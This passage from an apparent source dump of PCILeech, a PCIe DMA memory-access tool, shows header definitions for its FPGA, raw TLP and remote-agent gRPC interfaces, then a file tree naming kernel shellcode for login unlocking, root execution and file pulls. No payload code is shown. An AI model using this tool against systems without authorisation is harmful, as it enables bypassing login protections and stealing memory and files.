#define LC_OPT_FPGA_DEVICE_ID 0x0300008000000000 // RW - bus:dev:fn (ex: 04:00.0 == 0x0400).
#define LC_OPT_FPGA_FPGA_ID 0x0300008100000000 // R
#define LC_OPT_FPGA_VERSION_MAJOR 0x0300008200000000 // R
#define LC_OPT_FPGA_VERSION_MINOR 0x0300008300000000 // R
#define LC_OPT_FPGA_ALGO_TINY 0x0300008400000000 // RW - 1/0 use tiny 128-byte/tlp read algorithm.
#define LC_OPT_FPGA_ALGO_SYNCHRONOUS 0x0300008500000000 // RW - 1/0 use synchronous (old) read algorithm.
#define LC_OPT_FPGA_CFGSPACE_XILINX 0x0300008600000000 // RW - [lo-dword: register address in bytes] [bytes: 0-3: data, 4-7: byte_enable(if wr/set); top bit = cfg_mgmt_wr_rw1c_as_rw]
#define LC_OPT_FPGA_TLP_READ_CB_WITHINFO 0x0300009000000000 // RW - 1/0 call TLP read callback with additional string info in szInfo
#define LC_OPT_FPGA_TLP_READ_CB_FILTERCPL 0x0300009100000000 // RW - 1/0 call TLP read callback with memory read completions from read calls filtered
// Commands for LcCommand. Trailing comment gives the direction (R = result in
// *ppbDataOut, W = input in pbDataIn, RW = both). Commands marked "[not remote]"
// pass raw in-process pointers (contexts, callbacks) and are therefore not
// forwarded over a remote connection.
#define LC_CMD_FPGA_PCIECFGSPACE 0x0000010300000000 // R
#define LC_CMD_FPGA_CFGREGPCIE 0x0000010400000000 // RW - [lo-dword: register address]
#define LC_CMD_FPGA_CFGREGCFG 0x0000010500000000 // RW - [lo-dword: register address]
#define LC_CMD_FPGA_CFGREGDRP 0x0000010600000000 // RW - [lo-dword: register address]
#define LC_CMD_FPGA_CFGREGCFG_MARKWR 0x0000010700000000 // W - write with mask [lo-dword: register address] [bytes: 0-1: data, 2-3: mask]
#define LC_CMD_FPGA_CFGREGPCIE_MARKWR 0x0000010800000000 // W - write with mask [lo-dword: register address] [bytes: 0-1: data, 2-3: mask]
#define LC_CMD_FPGA_CFGREG_DEBUGPRINT 0x0000010a00000000 // N/A
#define LC_CMD_FPGA_PROBE 0x0000010b00000000 // RW
#define LC_CMD_FPGA_CFGSPACE_SHADOW_RD 0x0000010c00000000 // R
#define LC_CMD_FPGA_CFGSPACE_SHADOW_WR 0x0000010d00000000 // W - [lo-dword: config space write base address]
#define LC_CMD_FPGA_TLP_WRITE_SINGLE 0x0000011000000000 // W - write single tlp BYTE:s
#define LC_CMD_FPGA_TLP_WRITE_MULTIPLE 0x0000011100000000 // W - write multiple LC_TLP:s
#define LC_CMD_FPGA_TLP_TOSTRING 0x0000011200000000 // RW - convert single TLP to LPSTR; *pcbDataOut includes NULL terminator.
#define LC_CMD_FPGA_TLP_CONTEXT 0x2000011400000000 // W - set/unset TLP user-defined context to be passed to callback function. (pbDataIn == LPVOID user context). [not remote].
#define LC_CMD_FPGA_TLP_CONTEXT_RD 0x2000011b00000000 // R - get TLP user-defined context to be passed to callback function. [not remote].
#define LC_CMD_FPGA_TLP_FUNCTION_CALLBACK 0x2000011500000000 // W - set/unset TLP callback function (pbDataIn == PLC_TLP_CALLBACK). [not remote].
#define LC_CMD_FPGA_TLP_FUNCTION_CALLBACK_RD 0x2000011c00000000 // R - get TLP callback function. [not remote].
#define LC_CMD_FPGA_BAR_CONTEXT 0x2000012000000000 // W - set/unset BAR user-defined context to be passed to callback function. (pbDataIn == LPVOID user context). [not remote].
#define LC_CMD_FPGA_BAR_CONTEXT_RD 0x2000012100000000 // R - get BAR user-defined context to be passed to callback function. [not remote].
#define LC_CMD_FPGA_BAR_FUNCTION_CALLBACK 0x2000012200000000 // W - set/unset BAR callback function (pbDataIn == PLC_BAR_CALLBACK). [not remote].
#define LC_CMD_FPGA_BAR_FUNCTION_CALLBACK_RD 0x2000012300000000 // R - get BAR callback function. [not remote].
#define LC_CMD_FPGA_BAR_INFO 0x0000012400000000 // R - get BAR info (pbDataOut == LC_BAR_INFO[6]).
#define LC_CMD_FILE_DUMPHEADER_GET 0x0000020100000000 // R
#define LC_CMD_STATISTICS_GET 0x4000010000000000 // R
#define LC_CMD_MEMMAP_GET 0x4000020000000000 // R - MEMMAP as LPSTR
#define LC_CMD_MEMMAP_SET 0x4000030000000000 // W - MEMMAP as LPSTR
#define LC_CMD_MEMMAP_GET_STRUCT 0x4000040000000000 // R - MEMMAP as LC_MEMMAP_ENTRY[]
#define LC_CMD_MEMMAP_SET_STRUCT 0x4000050000000000 // W - MEMMAP as LC_MEMMAP_ENTRY[]
// Agent commands are executed by the remote LeechAgent, not locally. They
// expose code execution (EXEC_PYTHON), process control and file-system access
// on the agent host, so the connection to the agent should be authenticated
// (see the mTLS client constructors in leechgrpc.h).
#define LC_CMD_AGENT_EXEC_PYTHON 0x8000000100000000 // RW - [lo-dword: optional timeout in ms]
#define LC_CMD_AGENT_EXIT_PROCESS 0x8000000200000000 // - [lo-dword: process exit code]
#define LC_CMD_AGENT_VFS_LIST 0x8000000300000000 // RW
#define LC_CMD_AGENT_VFS_READ 0x8000000400000000 // RW
#define LC_CMD_AGENT_VFS_WRITE 0x8000000500000000 // RW
#define LC_CMD_AGENT_VFS_OPT_GET 0x8000000600000000 // RW
#define LC_CMD_AGENT_VFS_OPT_SET 0x8000000700000000 // RW
#define LC_CMD_AGENT_VFS_INITIALIZE 0x8000000800000000 // RW
#define LC_CMD_AGENT_VFS_CONSOLE 0x8000000900000000 // RW
// dwVersion magics for LC_CMD_AGENT_VFS_REQ / LC_CMD_AGENT_VFS_RSP.
#define LC_CMD_AGENT_VFS_REQ_VERSION 0xfeed0001
#define LC_CMD_AGENT_VFS_RSP_VERSION 0xfeee0001
#define LC_STATISTICS_VERSION 0xe1a10002
// Call identifiers: index into LC_STATISTICS.Call[] and LC_STATISTICS_NAME[],
// and the lo-dword argument of LC_OPT_CORE_STATISTICS_CALL_*. Keep
// LC_STATISTICS_ID_MAX in sync with the last entry and the name table.
#define LC_STATISTICS_ID_OPEN 0x00
#define LC_STATISTICS_ID_READ 0x01
#define LC_STATISTICS_ID_READSCATTER 0x02
#define LC_STATISTICS_ID_WRITE 0x03
#define LC_STATISTICS_ID_WRITESCATTER 0x04
#define LC_STATISTICS_ID_GETOPTION 0x05
#define LC_STATISTICS_ID_SETOPTION 0x06
#define LC_STATISTICS_ID_COMMAND 0x07
#define LC_STATISTICS_ID_MAX 0x07
/*
* Request header for the LC_CMD_AGENT_VFS_* commands. The struct is followed
* in the same buffer by cb bytes of payload (pb). The receiving side should
* treat it as untrusted wire input: check dwVersion, that cb fits inside the
* received message after the fixed header, and that uszPathFile is
* NUL-terminated within its 2*MAX_PATH buffer before use.
*/
typedef struct tdLC_CMD_AGENT_VFS_REQ {
DWORD dwVersion; // LC_CMD_AGENT_VFS_REQ_VERSION
DWORD _FutureUse;
CHAR uszPathFile[2*MAX_PATH]; // file path to list/read/write (presumably UTF-8 given the usz prefix - confirm)
union {
QWORD qwOffset; // offset to read/write
QWORD fOption; // option to get/set (qword data in *pb)
};
DWORD dwLength; // length to read
DWORD cb; // number of payload bytes in pb (write data / option value)
BYTE pb[0]; // zero-length trailer; payload follows the header
} LC_CMD_AGENT_VFS_REQ, *PLC_CMD_AGENT_VFS_REQ;
/*
* Response header for the LC_CMD_AGENT_VFS_* commands, followed by cb bytes
* of payload (pb). Receivers should validate cb against the received size
* just as for the request.
*/
typedef struct tdLC_CMD_AGENT_VFS_RSP {
DWORD dwVersion; // LC_CMD_AGENT_VFS_RSP_VERSION
DWORD dwStatus; // ntstatus of read/write
DWORD cbReadWrite; // number of bytes read/written
DWORD _FutureUse[2];
DWORD cb; // number of payload bytes in pb
BYTE pb[0]; // zero-length trailer; payload follows the header
} LC_CMD_AGENT_VFS_RSP, *PLC_CMD_AGENT_VFS_RSP;
// Display names indexed by LC_STATISTICS_ID_* (must contain exactly
// LC_STATISTICS_ID_MAX + 1 entries). Being 'static' in a header, every
// translation unit that includes this file gets its own copy.
static LPCSTR LC_STATISTICS_NAME[] = {
"LcOpen",
"LcRead",
"LcReadScatter",
"LcWrite",
"LcWriteScatter",
"LcGetOption",
"LcSetOption",
"LcCommand",
};
/*
* Call statistics returned by LC_CMD_STATISTICS_GET.
*/
typedef struct tdLC_STATISTICS {
DWORD dwVersion; // LC_STATISTICS_VERSION
DWORD _Reserved;
QWORD qwFreq; // tick frequency used by Call[].tm
struct {
QWORD c; // number of calls
QWORD tm; // total time in qwFreq ticks
} Call[LC_STATISTICS_ID_MAX + 1]; // indexed by LC_STATISTICS_ID_*
} LC_STATISTICS, *PLC_STATISTICS;
/*
* One physical memory map range, as used by LC_CMD_MEMMAP_GET_STRUCT /
* LC_CMD_MEMMAP_SET_STRUCT (array of entries).
*/
typedef struct tdLC_MEMMAP_ENTRY {
QWORD pa; // start physical address of the range
QWORD cb; // size of the range in bytes
QWORD paRemap; // NOTE(review): presumably the address the range maps to on the device side - confirm
} LC_MEMMAP_ENTRY, *PLC_MEMMAP_ENTRY;
// Target architecture, reported via LC_OPT_MEMORYINFO_ARCH.
typedef enum tdLC_ARCH_TP {
LC_ARCH_NA = 0, // not available / unknown
LC_ARCH_X86 = 1,
LC_ARCH_X86PAE = 2,
LC_ARCH_X64 = 3,
LC_ARCH_ARM64 = 4,
} LC_ARCH_TP;
//-----------------------------------------------------------------------------
// RAW TLP READ/WRITE SUPPORT:
//-----------------------------------------------------------------------------
/*
* TLP structure to be used with LC_CMD_FPGA_TLP_WRITE_MULTIPLE.
* Each entry references a caller-owned buffer holding one raw TLP.
*/
typedef struct tdLC_TLP {
DWORD cb; // size of the TLP in bytes
DWORD _Reserved1;
PBYTE pb; // raw TLP bytes (cb bytes)
} LC_TLP, *PLC_TLP;
/*
* Custom FPGA callback function called when a TLP is received.
* Callback function set by command LC_CMD_FPGA_TLP_FUNCTION_CALLBACK.
* User-defined context is set by command: LC_CMD_FPGA_TLP_CONTEXT.
* -- ctx = user context (may be NULL)
* -- cbTlp / pbTlp = raw received TLP; treat as untrusted bus input
* -- cbInfo / szInfo = optional string info, only supplied when
* LC_OPT_FPGA_TLP_READ_CB_WITHINFO is enabled
*/
typedef VOID(*PLC_TLP_FUNCTION_CALLBACK)(
_In_opt_ PVOID ctx,
_In_ DWORD cbTlp,
_In_ PBYTE pbTlp,
_In_opt_ DWORD cbInfo,
_In_opt_ LPSTR szInfo
);
// Sentinel values for LC_CMD_FPGA_TLP_FUNCTION_CALLBACK: NULL disables the
// callback; (-1) is a marker, not a callable function pointer.
#define LC_TLP_FUNCTION_CALLBACK_DISABLE (PLC_TLP_FUNCTION_CALLBACK)(NULL)
#define LC_TLP_FUNCTION_CALLBACK_DUMMY (PLC_TLP_FUNCTION_CALLBACK)(-1)
//-----------------------------------------------------------------------------
// VMM (VM) LOOPBACK SUPPORT:
// Functionality is used to create a VMM loopback device which is used by VMM
// to read and write memory to/from a virtual machine. See VMM for an example.
// Struct is passed in the 'hlcvmm' parameter to LcCreate() and will be copied.
//-----------------------------------------------------------------------------
#define LC_VMM_VERSION 0x1eef0001
/*
* VMM loopback descriptor. The pfn* members are untyped function pointers
* (PVOID) - the exact signatures are defined by VMM and must be cast by the
* consumer; no type checking happens here.
*/
typedef struct tdLC_VMM {
DWORD dwVersion; // LC_VMM_VERSION
HANDLE hVMM;
HANDLE hVMMVM;
PVOID pfnVMMDLL_ConfigGet;
PVOID pfnVMMDLL_VmMemReadScatter;
PVOID pfnVMMDLL_VmMemWriteScatter;
} LC_VMM, *PLC_VMM;
//-----------------------------------------------------------------------------
// PCIE BAR SUPPORT:
//-----------------------------------------------------------------------------
/*
* PCIe Base Address Register description (see LC_CMD_FPGA_BAR_INFO).
*/
typedef struct tdLC_BAR {
BOOL fValid; // FALSE = BAR not present; remaining fields unspecified
BOOL fIO; // I/O space BAR (as opposed to memory space)
BOOL f64Bit; // 64-bit memory BAR
BOOL fPrefetchable;
DWORD _Filler[3];
DWORD iBar; // BAR index
QWORD pa; // base address
QWORD cb; // size in bytes
} LC_BAR, *PLC_BAR;
/*
* A single BAR read/write request delivered to PLC_BAR_FUNCTION_CALLBACK.
* NOTE(review): the callback should treat oData/cbData as untrusted (they come
* from the bus) and verify cbData <= sizeof(pbData) and oData + cbData <=
* pBar->cb before touching pbData or any backing store.
*/
typedef struct tdLC_BAR_REQUEST {
PVOID ctx; // user context (set by command LC_CMD_FPGA_BAR_CONTEXT)
PLC_BAR pBar; // BAR info
BYTE bTag; // TLP tag (0-255)
BYTE bFirstBE; // First byte enable (0-3) [relevant for writes]
BYTE bLastBE; // Last byte enable (0-3) [relevant for writes]
BYTE _Filler;
BOOL f64; // 64-bit bar access (false = 32-bit)
BOOL fRead; // BAR read request, called function should update pbData with read data and set fReadReply = TRUE on success.
BOOL fReadReply; // Read success - should be updated by called function upon read success (after updating pbData).
BOOL fWrite; // BAR write request (no reply should be sent, check byte-enables bFirstBE/bLastBE)
DWORD cbData; // number of bytes to read/write
QWORD oData; // data offset in BAR.
BYTE pbData[4096]; // bytes to write or read data (to be updated by called function).
} LC_BAR_REQUEST, *PLC_BAR_REQUEST;
/*
* Custom FPGA callback function to be called when BAR read/write is received.
* Callback function set by command LC_CMD_FPGA_BAR_FUNCTION_CALLBACK.
* User-defined context is set by command: LC_CMD_FPGA_BAR_CONTEXT.
* Read reply is sent by updating pbData with read data and fReadReply = TRUE.
* To return Unsupported Request (UR) set fReadReply = FALSE on a MRd request.
* -- pBarRequest = request to service; see LC_BAR_REQUEST for field semantics.
*/
typedef VOID(*PLC_BAR_FUNCTION_CALLBACK)(_Inout_ PLC_BAR_REQUEST pBarRequest);
// Sentinel values for LC_CMD_FPGA_BAR_FUNCTION_CALLBACK: NULL disables the
// callback; (-1) is a marker (zero-BAR behaviour), not a callable function pointer.
#define LC_BAR_FUNCTION_CALLBACK_DISABLE (PLC_BAR_FUNCTION_CALLBACK)(NULL)
#define LC_BAR_FUNCTION_CALLBACK_ZEROBAR (PLC_BAR_FUNCTION_CALLBACK)(-1)
#ifdef __cplusplus
}
#endif /* __cplusplus */
#endif /* __LEECHCORE_H__ */
================================================
FILE: includes/leechgrpc.h
================================================
// leechgrpc.h : external header of the libleechgrpc library.
//
// libleechgrpc is a library used by LeechCore to communicate with a LeechAgent
// gRPC server. The library provides functions to create a gRPC client and
// server, submit commands to the server, and handle incoming commands.
//
// libleechgrpc offers a platform-independent way to communicate with remote
// LeechAgent instances, using gRPC as the underlying communication protocol.
// The library supports both insecure and secure connections, with secure
// connections using mTLS.
//
// For more information visit the project page at:
// https://github.com/ufrisk/libleechgrpc
//
// (c) Ulf Frisk, 2025
// Author: Ulf Frisk, pcileech@frizk.net
//
#ifndef __LEECHGRPC_H__
#define __LEECHGRPC_H__
#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */
// Upper bound on a single gRPC message (64 MiB) and the client call timeout.
#define LEECHGRPC_MESSAGE_SIZE_MAX (64*1024*1024)
#define LEECHGRPC_CLIENT_TIMEOUT_MS (5000)
#ifdef _WIN32
#include <Windows.h>
#define LEECHGRPC_EXPORTED_FUNCTION __declspec(dllexport)
#endif /* _WIN32 */
#if defined(LINUX) || defined(MACOS)
#include <inttypes.h>
#include <stdlib.h>
#define LEECHGRPC_EXPORTED_FUNCTION __attribute__((visibility("default")))
// Minimal Windows-style type subset for non-Windows builds (same widths as leechcore.h).
typedef void VOID, *PVOID, *HANDLE;
typedef size_t SIZE_T;
typedef uint32_t DWORD, BOOL;
typedef uint8_t BYTE, *PBYTE;
typedef char CHAR, *LPSTR;
typedef const char *LPCSTR;
#define _Success_(x)
#define _In_
#define _Out_
#define _In_opt_
#endif /* LINUX || MACOS */
// Opaque handles. Both are plain void* so the compiler will not catch a
// client handle passed to a server function (or vice versa) - keep them apart.
typedef void *LEECHGRPC_CLIENT_HANDLE, *LEECHGRPC_SERVER_HANDLE;
//-----------------------------------------------------------------------------
// LeechgRPC Client API:
//-----------------------------------------------------------------------------
/*
* Submit a command to the gRPC server.
* -- hGRPC: Handle to the gRPC client.
* -- pbIn: Pointer to the input buffer.
* -- cbIn: Size of the input buffer (bounded by LEECHGRPC_MESSAGE_SIZE_MAX).
* -- ppbOut: Pointer to receive the output buffer. The caller is responsible for freeing this buffer with LocalFree/free.
* -- pcbOut: Pointer to receive the size of the output buffer.
* -- return: TRUE if the command was successfully submitted; otherwise, FALSE.
*/
LEECHGRPC_EXPORTED_FUNCTION _Success_(return)
BOOL leechgrpc_client_submit_command(
_In_ LEECHGRPC_CLIENT_HANDLE hGRPC,
_In_ PBYTE pbIn,
_In_ SIZE_T cbIn,
_Out_ PBYTE *ppbOut,
_Out_ SIZE_T *pcbOut
);
// Function-pointer type matching the export above (for dynamic loading).
typedef BOOL(*pfn_leechgrpc_client_submit_command)(
_In_ LEECHGRPC_CLIENT_HANDLE hGRPC,
_In_ PBYTE pbIn,
_In_ SIZE_T cbIn,
_Out_ PBYTE *ppbOut,
_Out_ SIZE_T *pcbOut
);
/*
* Free the gRPC client connection.
* -- hGRPC: Handle to the gRPC client (must not be used afterwards).
*/
LEECHGRPC_EXPORTED_FUNCTION
VOID leechgrpc_client_free(
_In_ LEECHGRPC_CLIENT_HANDLE hGRPC
);
// Function-pointer type matching the export above (for dynamic loading).
typedef VOID(*pfn_leechgrpc_client_free)(
_In_ LEECHGRPC_CLIENT_HANDLE hGRPC
);
/*
* Create an insecure unauthenticated unencrypted gRPC client connection to the gRPC server.
* Neither peer is authenticated and all traffic (including agent commands)
* is sent in the clear; intended for trusted/local networks only.
* -- szAddress: Address of the gRPC server.
* -- dwPort: Port of the gRPC server.
* -- return: Handle to the gRPC client connection, or NULL on failure.
*/
LEECHGRPC_EXPORTED_FUNCTION _Success_(return != NULL)
LEECHGRPC_CLIENT_HANDLE leechgrpc_client_create_insecure(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort
);
// Function-pointer type matching the export above (for dynamic loading).
typedef LEECHGRPC_CLIENT_HANDLE(*pfn_leechgrpc_client_create_insecure)(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort
);
/*
* Create a gRPC client connection to the gRPC server with mTLS.
* -- szAddress: Address of the gRPC server.
* -- dwPort: Port of the gRPC server.
* -- szTlsServerHostnameOverride: Optional hostname to verify against the server certificate (if different from address).
* -- szTlsServerCertPath: Server CA certificate to trust for mTLS connections.
* NOTE(review): optional - what is trusted when NULL is passed (presumably
* the system trust store) is not stated here; confirm against libleechgrpc.
* -- szTlsClientP12Path: Path to the client's TLS certificate (incl. chain) & private key (.p12 / .pfx).
* -- szTlsClientP12Password: Password for the client's TLS certificate & private key (.p12 / .pfx).
* -- return: Handle to the gRPC client connection, or NULL on failure.
*/
LEECHGRPC_EXPORTED_FUNCTION _Success_(return != NULL)
LEECHGRPC_CLIENT_HANDLE leechgrpc_client_create_secure_p12(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCertPath,
_In_ LPCSTR szTlsClientP12Path,
_In_ LPCSTR szTlsClientP12Password
);
// Function-pointer type matching the export above (for dynamic loading).
typedef LEECHGRPC_CLIENT_HANDLE(*pfn_leechgrpc_client_create_secure_p12)(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCertPath,
_In_ LPCSTR szTlsClientP12Path,
_In_ LPCSTR szTlsClientP12Password
);
/*
* Create a gRPC client connection to the gRPC server with mTLS.
* Unlike the *_pemfile variant the certificate/key parameters are the PEM
* contents themselves, not file paths.
* -- szAddress: Address of the gRPC server.
* -- dwPort: Port of the gRPC server.
* -- szTlsServerHostnameOverride: Optional hostname to verify against the server certificate (if different from address).
* -- szTlsServerCert: Server CA certificate to trust for mTLS connections (optional; see NOTE on the _p12 variant).
* -- szTlsClientCert: Client TLS certificate.
* -- szTlsClientCertPrivateKey: Client TLS certificate private key.
* NOTE(review): key material is passed in-process as a plain string; the
* caller owns its lifetime and should clear it once no longer needed.
* -- return: Handle to the gRPC client connection, or NULL on failure.
*/
LEECHGRPC_EXPORTED_FUNCTION _Success_(return != NULL)
LEECHGRPC_CLIENT_HANDLE leechgrpc_client_create_secure_pemraw(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCert,
_In_ LPCSTR szTlsClientCert,
_In_ LPCSTR szTlsClientCertPrivateKey
);
// Function-pointer type matching the export above (for dynamic loading).
typedef LEECHGRPC_CLIENT_HANDLE(*pfn_leechgrpc_client_create_secure_pemraw)(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCert,
_In_ LPCSTR szTlsClientCert,
_In_ LPCSTR szTlsClientCertPrivateKey
);
/*
* Create a gRPC client connection to the gRPC server with mTLS.
* The certificate/key parameters are paths to PEM files.
* -- szAddress: Address of the gRPC server.
* -- dwPort: Port of the gRPC server.
* -- szTlsServerHostnameOverride: Optional hostname to verify against the server certificate (if different from address).
* -- szTlsServerCertPath: Server CA certificate to trust for mTLS connections (optional; see NOTE on the _p12 variant).
* -- szTlsClientCertPath: Client TLS certificate.
* -- szTlsClientCertPrivateKeyPath: Client TLS certificate private key.
* -- return: Handle to the gRPC client connection, or NULL on failure.
*/
LEECHGRPC_EXPORTED_FUNCTION _Success_(return != NULL)
LEECHGRPC_CLIENT_HANDLE leechgrpc_client_create_secure_pemfile(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCertPath,
_In_ LPCSTR szTlsClientCertPath,
_In_ LPCSTR szTlsClientCertPrivateKeyPath
);
// Function-pointer type matching the export above (for dynamic loading).
typedef LEECHGRPC_CLIENT_HANDLE(*pfn_leechgrpc_client_create_secure_pemfile)(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCertPath,
_In_ LPCSTR szTlsClientCertPath,
_In_ LPCSTR szTlsClientCertPrivateKeyPath
);
//-----------------------------------------------------------------------------
// LeechgRPC Server API:
//-----------------------------------------------------------------------------
/*
* Callback function used to pass on a command received by the gRPC server.
* The input buffer originates from a remote peer and should be treated as untrusted:
* validate cbIn and the buffer contents before acting on them.
* -- ctx: Optional context pointer (presumably the value registered with the server and passed through unchanged - confirm).
* -- pbIn: Pointer to the input buffer.
* -- cbIn: Size of the input buffer.
* -- ppbOut: Pointer to receive the output buffer allocated by the callback function, freed by the caller.
*    NOTE(review): which allocator the caller frees with is not stated here - confirm so the callback allocates compatibly.
* -- pcbOut: Pointer to receive the size of the output buffer.
*/
typedef VOID(*PFN_RESERVED_SUBMIT_COMMAND_CB)(_In_opt_ PVOID ctx, _In_ PBYTE pbIn, _In_ SIZE_T cbIn, _Out_ PBYTE *ppbOut, _Out_ SIZE_T *pcbOut);
/*
* Wait for the gRPC server to shut down.
* -- hGRPC: Handle to the gRPC server.
*/
LEECHGRPC_EXPORTED_FUNCTION
VOID leechgrpc_server_wait(_In_ LEECHGRPC_SERVER_HANDLE hGRPC);
/* Function-pointer type matching leechgrpc_server_wait (presumably for run-time export resolution - confirm). */
typedef VOID(*pfn_leechgrpc_server_wait)(_In_ LEECHGRPC_SERVER_HANDLE hGRPC);
/*
* Shut down the
gitextract_qpoecbmd/
├── .gitignore
├── LICENSE
├── files/
│ ├── Certs/
│ │ └── readme.txt
│ ├── agent-find-rwx.py
│ ├── fbsdx64_filepull.ksh
│ ├── lx64_exec_root.ksh
│ ├── lx64_filedelete.ksh
│ ├── lx64_filepull.ksh
│ ├── lx64_filepush.ksh
│ ├── macos_filepull.ksh
│ ├── macos_filepush.ksh
│ ├── macos_unlock.ksh
│ ├── pcileech.icns
│ ├── pcileech.txt
│ ├── pcileech_gensig.cfg
│ ├── signature_info.txt
│ ├── stickykeys_cmd_win.sig
│ ├── uefi_textout.ksh
│ ├── uefi_winload_ntos_patch.ksh
│ ├── unlock_macos.sig
│ ├── unlock_win10x64.sig
│ ├── unlock_win10x86.sig
│ ├── unlock_win11x64.sig
│ ├── unlock_win8x64.sig
│ ├── unlock_winvistax64.sig
│ ├── win7x64.kmd
│ ├── winvistax64.kmd
│ ├── wx64_driverinfo.ksh
│ ├── wx64_driverload_svc.ksh
│ ├── wx64_driverunload.ksh
│ ├── wx64_filepull.ksh
│ ├── wx64_filepush.ksh
│ ├── wx64_pageinfo.ksh
│ ├── wx64_pagesignature.ksh
│ ├── wx64_psblue.ksh
│ ├── wx64_pscmd.ksh
│ ├── wx64_pscmd_user.ksh
│ ├── wx64_pscreate.ksh
│ ├── wx64_pskill.ksh
│ ├── wx64_pslist.ksh
│ └── wx64_unlock.ksh
├── includes/
│ ├── dokan.h
│ ├── fileinfo.h
│ ├── leechcore.h
│ ├── leechgrpc.h
│ ├── lib32/
│ │ ├── leechcore.lib
│ │ └── vmm.lib
│ ├── lib64/
│ │ ├── leechcore.lib
│ │ └── vmm.lib
│ ├── libpdbcrust.h
│ ├── public.h
│ ├── vmmdll.h
│ └── vmmyara.h
├── pcileech/
│ ├── Makefile
│ ├── Makefile.macos
│ ├── charutil.c
│ ├── charutil.h
│ ├── device.c
│ ├── device.h
│ ├── executor.c
│ ├── executor.h
│ ├── extra.c
│ ├── extra.h
│ ├── help.c
│ ├── help.h
│ ├── kmd.c
│ ├── kmd.h
│ ├── memdump.c
│ ├── memdump.h
│ ├── mempatch.c
│ ├── mempatch.h
│ ├── ob/
│ │ ├── ob.h
│ │ ├── ob_cachemap.c
│ │ ├── ob_core.c
│ │ ├── ob_map.c
│ │ └── ob_set.c
│ ├── oscompatibility.c
│ ├── oscompatibility.h
│ ├── pcileech.c
│ ├── pcileech.h
│ ├── pcileech.rc
│ ├── pcileech.vcxproj
│ ├── pcileech.vcxproj.filters
│ ├── pcileech.vcxproj.user
│ ├── shellcode.h
│ ├── statistics.c
│ ├── statistics.h
│ ├── umd.c
│ ├── umd.h
│ ├── util.c
│ ├── util.h
│ ├── version.h
│ ├── vfs.c
│ ├── vfs.h
│ ├── vfslist.c
│ ├── vfslist.h
│ ├── vmmx.c
│ └── vmmx.h
├── pcileech.sln
├── pcileech_shellcode/
│ ├── fbsdx64_common.c
│ ├── fbsdx64_common.h
│ ├── fbsdx64_common_a.asm
│ ├── fbsdx64_filepull.c
│ ├── fbsdx64_stage2.asm
│ ├── fbsdx64_stage3.asm
│ ├── fbsdx64_stage3_c.c
│ ├── info_kmd_core.txt
│ ├── lx64_common.c
│ ├── lx64_common.h
│ ├── lx64_common_a.asm
│ ├── lx64_exec_root.c
│ ├── lx64_filedelete.c
│ ├── lx64_filepull.c
│ ├── lx64_filepush.c
│ ├── lx64_stage2.asm
│ ├── lx64_stage2_efi.asm
│ ├── lx64_stage3.asm
│ ├── lx64_stage3_c.c
│ ├── lx64_stage3_pre.asm
│ ├── lx64_vfs.c
│ ├── macos_common.c
│ ├── macos_common.h
│ ├── macos_common_a.asm
│ ├── macos_filedelete.c
│ ├── macos_filepull.c
│ ├── macos_filepush.c
│ ├── macos_stage2.asm
│ ├── macos_stage3.asm
│ ├── macos_stage3_c.c
│ ├── macos_unlock.c
│ ├── macos_vfs.c
│ ├── pcileech_shellcode.vcxproj
│ ├── pcileech_shellcode.vcxproj.filters
│ ├── pcileech_shellcode.vcxproj.user
│ ├── statuscodes.h
│ ├── uefi_common.c
│ ├── uefi_common.h
│ ├── uefi_common_a.asm
│ ├── uefi_kmd.asm
│ ├── uefi_kmd_c.c
│ ├── uefi_textout.c
│ ├── uefi_winload_ntos_kmd.asm
│ ├── uefi_winload_ntos_kmd_c.c
│ ├── uefi_winload_ntos_patch.c
│ ├── wx64_common.c
│ ├── wx64_common.h
│ ├── wx64_common_a.asm
│ ├── wx64_driverinfo.c
│ ├── wx64_driverload_svc.c
│ ├── wx64_driverunload.c
│ ├── wx64_exec_user.asm
│ ├── wx64_exec_user_c.c
│ ├── wx64_filepull.c
│ ├── wx64_filepush.c
│ ├── wx64_pageinfo.asm
│ ├── wx64_pagesignature.c
│ ├── wx64_psblue.asm
│ ├── wx64_pscreate.c
│ ├── wx64_pskill.c
│ ├── wx64_pslist.c
│ ├── wx64_stage1.asm
│ ├── wx64_stage2.asm
│ ├── wx64_stage23_vmm.asm
│ ├── wx64_stage23_vmm3.asm
│ ├── wx64_stage2_hal.asm
│ ├── wx64_stage3.asm
│ ├── wx64_stage3_c.c
│ ├── wx64_stage3_pre.asm
│ ├── wx64_umd_exec.asm
│ ├── wx64_umd_exec_c.c
│ ├── wx64_unlock.c
│ └── wx64_vfs.c
├── readme.md
├── usb3380.md
└── usb3380_flash/
├── linux/
│ ├── Makefile
│ ├── pcileech_flash.c
│ ├── readme.md
│ └── readme_flash.txt
└── windows/
├── USB3380Flash/
│ ├── USB3380Flash.c
│ ├── USB3380Flash.h
│ ├── USB3380Flash.inf
│ ├── USB3380Flash.user
│ ├── USB3380Flash.vcxproj
│ ├── USB3380Flash.vcxproj.filters
│ └── USB3380Flash.vcxproj.user
└── USB3380Flash_Installer/
├── USB3380Flash_Installer.vcxproj
├── USB3380Flash_Installer.vcxproj.filters
├── USB3380Flash_Installer.vcxproj.user
└── installer.c
SYMBOL INDEX (1105 symbols across 78 files)
FILE: includes/dokan.h
type VOID (line 126) | typedef VOID *DOKAN_HANDLE, **PDOKAN_HANDLE;
type DOKAN_OPTIONS (line 133) | typedef struct _DOKAN_OPTIONS {
type DOKAN_FILE_INFO (line 170) | typedef struct _DOKAN_FILE_INFO {
